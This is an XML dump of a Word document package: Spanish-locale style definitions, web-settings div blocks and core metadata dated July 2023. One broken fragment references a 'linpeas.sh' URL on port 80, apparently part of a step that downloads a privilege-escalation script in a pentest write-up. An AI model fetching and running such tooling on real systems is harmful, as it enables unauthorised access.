    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007F43E3"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007F4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10515">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="413018027">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="967323704">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="123551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P: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80/linpeas.sh"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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-05T23:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-06T00:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>